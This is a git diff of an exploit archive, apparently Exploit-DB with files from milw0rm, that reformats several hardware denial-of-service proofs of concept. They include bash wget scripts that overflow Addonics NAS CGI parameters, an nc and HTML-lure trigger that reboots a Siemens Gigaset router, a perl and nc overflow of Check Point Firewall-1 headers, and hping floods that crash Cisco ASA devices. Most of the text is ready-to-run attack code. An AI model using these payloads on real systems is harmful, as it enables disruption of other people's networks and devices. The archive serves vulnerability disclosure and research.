"http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;" -;; -'4') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=a&data1=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data2=0;" -;; -'5') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;" -;; -'6') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;" -;; -'7') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;" -;; -esac - -echo "Stack Smashed..." - -# milw0rm.com [2009-03-09] +#!/bin/bash +###################################################### +# Addonics NAS Adapter Post-Auth DoS +# Tested against R3282-1.33c LOADER32 1.15, and NASU2FW41 Loader 1.17 +# Coded by Mike Cyr, aka h00die +# mcyr2 at csc dot_____________com +# Notes: Any of these BoF crashes the entire stack from the web GUI +# so throw a GET, and bye bye baby! +# Greetz to muts and loganWHD, I tried harder +# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily +# Log: Vendor notification feb 9, 2009 for BoF in R3282-1.33c LOADER32 1.15 firmware +# March 8, 2009: Second vendor notification for BoF in NASU2FW41 Loader 1.17 firmware +# March 9, 2009: Code release on Milw0rm, Bid sent. +###################################################### + +echo "Addonics NAS Adapter Post-Auth DoS" +echo "Written by H00die" + +echo "------------------------" +echo "Addonics IP:" +read -e IP +echo "Addonics GUI Username:" +read -e USERNAME +echo "Addonics GUI Password:" +read -e PASSWORD + +echo "-----------------------" +echo "Select Buffer:" +echo "1. FTP: Username (R3282-1.33c LOADER32 1.15)" +echo "2. FTP: Password (R3282-1.33c LOADER32 1.15)" +echo "3. SMB: Username (R3282-1.33c LOADER32 1.15)" +echo "4. SMB: Password (R3282-1.33c LOADER32 1.15, NASU2FW41 Loader 1.17)" +echo "5. FTP: Username (NASU2FW41 Loader 1.17)" +echo "6. FTP: Password (NASU2FW41 Loader 1.17)" +echo "7. SMB: Username (NASU2FW41 Loader 1.17)" + +read -e BOF + +echo "" +echo "-----------------------" +echo "Sending Malicious GET request" +case "$BOF" in +'1') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;" +;; +'2') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;" +;; +'3') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;" +;; +'4') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=a&data1=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data2=0;" +;; +'5') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Account_passwd=a&ftp_att=W;" +;; +'6') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=ftp.htm&failure=fail.htm&type=ftps_user_add&Account=a&Account_passwd=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&ftp_att=W;" +;; +'7') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/nas.cgi?redirect=smb.htm&failure=fail.htm&type=smb_acct&action=smb_new&acct=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&data1=test&data2=0;" +;; +esac + +echo "Stack Smashed..." + +# milw0rm.com [2009-03-09] diff --git a/platforms/hardware/dos/8260.txt b/platforms/hardware/dos/8260.txt index 58d8fc19a..00c9b1df9 100755 --- a/platforms/hardware/dos/8260.txt +++ b/platforms/hardware/dos/8260.txt @@ -1,85 +1,85 @@ - _ _ _____ _ ___ _____ _ _ - / / / / ____/ / / _/_ __/ / / / - / /_/ / __/ / / / / / / / /_/ / - / __ / /___/ /____/ / / / / __ / - /_/ /_/_____/_____/___/ /_/ /_/ /_/ - Helith - 0815 --------------------------------------------------------------------------------- - -Author : Benkei -Date : 2008-02-08 -Vendor : Siemens -Affected product : Gigaset SE461 WiMAX router -Firmware version : 1.5-BL024.9.6401 - Propably other firmware versions are affected as well -Type : Denial of Service - -OSVDB : -Milw0rm : -CVE : -ISS X-Force: : - - -After establishing a tcp connection to the affected device on port 53 from the -LAN interface and after closing the connection the router will restart. - -Sometimes when using the web trigger with Internet explorer the WAN -configuration (ip, gateway ip, dns servers) for the device was lost and a -hardware reset was needed in order to make the device usable again. - -This issue can be triggered from the LAN interface by direct connection or -by using specially crafted web content. For the web content to be able to -trigger the issue a browser withouth security restrictions on connection to -port 53 must be used, the tests done shows Internet Explorer like the only -one cappable of activating the bug. - -Test made worked with Internet explorer version 7.0.6001.18000, it -didnt worked with Opera version 9.63 build 10476, Mozilla Firefox -version 3.0.1. nor Chrome 1.0.154.48. The html tags , an -worked. - - -Steps to reproduce: - -# direct connection -# nc -nvv 192.168.1.1 53 - -Or force someone into the lan segment of the router to open an html file -with one of the following tags and wait for the connection to be established -and closed. After 5 upon 10 seconds the device will reboot. - -<+Tags which can get used+> - - -click me - - -
-
- - - - - - - - - - - -<-End-> - -# example html file -# "p" is a fictional file to ensure that the browser requests something - - - - - - - - - - - -# milw0rm.com [2009-03-23] + _ _ _____ _ ___ _____ _ _ + / / / / ____/ / / _/_ __/ / / / + / /_/ / __/ / / / / / / / /_/ / + / __ / /___/ /____/ / / / / __ / + /_/ /_/_____/_____/___/ /_/ /_/ /_/ + Helith - 0815 +-------------------------------------------------------------------------------- + +Author : Benkei +Date : 2008-02-08 +Vendor : Siemens +Affected product : Gigaset SE461 WiMAX router +Firmware version : 1.5-BL024.9.6401 + Propably other firmware versions are affected as well +Type : Denial of Service + +OSVDB : +Milw0rm : +CVE : +ISS X-Force: : + + +After establishing a tcp connection to the affected device on port 53 from the +LAN interface and after closing the connection the router will restart. + +Sometimes when using the web trigger with Internet explorer the WAN +configuration (ip, gateway ip, dns servers) for the device was lost and a +hardware reset was needed in order to make the device usable again. + +This issue can be triggered from the LAN interface by direct connection or +by using specially crafted web content. For the web content to be able to +trigger the issue a browser withouth security restrictions on connection to +port 53 must be used, the tests done shows Internet Explorer like the only +one cappable of activating the bug. + +Test made worked with Internet explorer version 7.0.6001.18000, it +didnt worked with Opera version 9.63 build 10476, Mozilla Firefox +version 3.0.1. nor Chrome 1.0.154.48. The html tags , an +worked. + + +Steps to reproduce: + +# direct connection +# nc -nvv 192.168.1.1 53 + +Or force someone into the lan segment of the router to open an html file +with one of the following tags and wait for the connection to be established +and closed. After 5 upon 10 seconds the device will reboot. + +<+Tags which can get used+> + + +click me + + +
+
+ + + + + + + + + + + +<-End-> + +# example html file +# "p" is a fictional file to ensure that the browser requests something + + + + + + + + + + + +# milw0rm.com [2009-03-23] diff --git a/platforms/hardware/dos/8313.txt b/platforms/hardware/dos/8313.txt index aed483c25..b40541966 100755 --- a/platforms/hardware/dos/8313.txt +++ b/platforms/hardware/dos/8313.txt @@ -1,33 +1,33 @@ -- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow - -- Description - -The Check Point Firewall-1 PKI Web Service, running by default on TCP -port 18264, is vulnerable to a remote overflow in the handling of very -long HTTP headers. This was discovered during a pen-test where the -client would not allow further analysis and would not provide the full -product/version info. Initial testing indicates the 'Authorization' -and 'Referer' headers were vulnerable. - -- Product - -Check Point, Firewall-1, unknown - -- PoC - -perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 . -"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006 -09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 . -"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc -suckit.com 18264 - -- Solution - -None - -- Timeline - -2006-11-06: Vulnerability Discovered -2009-03-29: Disclosed to Public - -# milw0rm.com [2009-03-30] +- Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow + +- Description + +The Check Point Firewall-1 PKI Web Service, running by default on TCP +port 18264, is vulnerable to a remote overflow in the handling of very +long HTTP headers. This was discovered during a pen-test where the +client would not allow further analysis and would not provide the full +product/version info. Initial testing indicates the 'Authorization' +and 'Referer' headers were vulnerable. + +- Product + +Check Point, Firewall-1, unknown + +- PoC + +perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 . +"\r\nFrom: bugs@hugs.com\r\nIf-Modified-Since: Fri, 13 Dec 2006 +09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 . +"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc +suckit.com 18264 + +- Solution + +None + +- Timeline + +2006-11-06: Vulnerability Discovered +2009-03-29: Disclosed to Public + +# milw0rm.com [2009-03-30] diff --git a/platforms/hardware/dos/8393.txt b/platforms/hardware/dos/8393.txt index 4c79776fc..fc3325fa2 100755 --- a/platforms/hardware/dos/8393.txt +++ b/platforms/hardware/dos/8393.txt @@ -1,28 +1,28 @@ -The vulnerability affects the following Cisco ASA/PIX versions: - -Release Fixed in: --------- --------- -6.3 Not affected -7.0 7.0(8.6) -7.1 7.1(2.81) -7.2 7.2(4.30) -8.0 8.0(4.28) -8.1 8.1(2.19) -8.2 8.2(0.230) - ------------------------------ -Triggering the vuln ------------------------------- - -/*Utilize 1550 blocks on an ASA to trigger a crash...*/ -hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2 - -/* Trigger the vuln a bit faster */ -hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2 - -Reloading the device is the only way to recover from the denial of service. - -| Daniel Uriah Clemens -"Moments of sorrow are moments of sobriety" - -# milw0rm.com [2009-04-10] +The vulnerability affects the following Cisco ASA/PIX versions: + +Release Fixed in: +-------- --------- +6.3 Not affected +7.0 7.0(8.6) +7.1 7.1(2.81) +7.2 7.2(4.30) +8.0 8.0(4.28) +8.1 8.1(2.19) +8.2 8.2(0.230) + +----------------------------- +Triggering the vuln +------------------------------ + +/*Utilize 1550 blocks on an ASA to trigger a crash...*/ +hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2 + +/* Trigger the vuln a bit faster */ +hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2 + +Reloading the device is the only way to recover from the denial of service. + +| Daniel Uriah Clemens +"Moments of sorrow are moments of sobriety" + +# milw0rm.com [2009-04-10] diff --git a/platforms/hardware/dos/8490.sh b/platforms/hardware/dos/8490.sh index 758274dc6..0308ea9e7 100755 --- a/platforms/hardware/dos/8490.sh +++ b/platforms/hardware/dos/8490.sh @@ -1,48 +1,48 @@ -#!/bin/bash -###################################################### -# Addonics NAS Adapter bts.cgi Post-Auth DoS -# Tested against NASU2FW41 Loader 1.17 -# Coded by Mike Cyr, aka h00die -# mcyr2 at csc dot_____________com -# Notes: Any of these BoF crashes the entire stack from the web GUI -# so throw a GET, and bye bye baby! -# Greetz to muts and loganWHD, I tried harder -# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily -# Log: Vendor notification March 25, 2009 -# Vendor response March 26, 2009 -# Milw0rm code release April 19, 2009 -###################################################### - -echo "Addonics NAS Adapter bts.cgi Post-Auth DoS" -echo "Written by H00die" - -echo "------------------------" -echo "Addonics IP:" -read -e IP -echo "Addonics GUI Username:" -read -e USERNAME -echo "Addonics GUI Password:" -read -e PASSWORD - -echo "-----------------------" -echo "Select Buffer:" -echo "1. BT Download Path" -echo "2. BT Torrent Path (only works with a drive attached)" - -read -e BOF - -echo "" -echo "-----------------------" -echo "Sending Malicious GET request" -case "$BOF" in -'1') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" -;; -'2') -wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD "http://$IP/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC" -;; -esac - -echo "Stack Smashed..." - -# milw0rm.com [2009-04-20] +#!/bin/bash +###################################################### +# Addonics NAS Adapter bts.cgi Post-Auth DoS +# Tested against NASU2FW41 Loader 1.17 +# Coded by Mike Cyr, aka h00die +# mcyr2 at csc dot_____________com +# Notes: Any of these BoF crashes the entire stack from the web GUI +# so throw a GET, and bye bye baby! +# Greetz to muts and loganWHD, I tried harder +# http://www.offensive-security.com/offsec101.php turning script kiddies into ninjas daily +# Log: Vendor notification March 25, 2009 +# Vendor response March 26, 2009 +# Milw0rm code release April 19, 2009 +###################################################### + +echo "Addonics NAS Adapter bts.cgi Post-Auth DoS" +echo "Written by H00die" + +echo "------------------------" +echo "Addonics IP:" +read -e IP +echo "Addonics GUI Username:" +read -e USERNAME +echo "Addonics GUI Password:" +read -e PASSWORD + +echo "-----------------------" +echo "Select Buffer:" +echo "1. BT Download Path" +echo "2. BT Torrent Path (only works with a drive attached)" + +read -e BOF + +echo "" +echo "-----------------------" +echo "Sending Malicious GET request" +case "$BOF" in +'1') +wget -q --timeout=3 -t 1 --http-user=$USERNAME --http-password=$PASSWORD 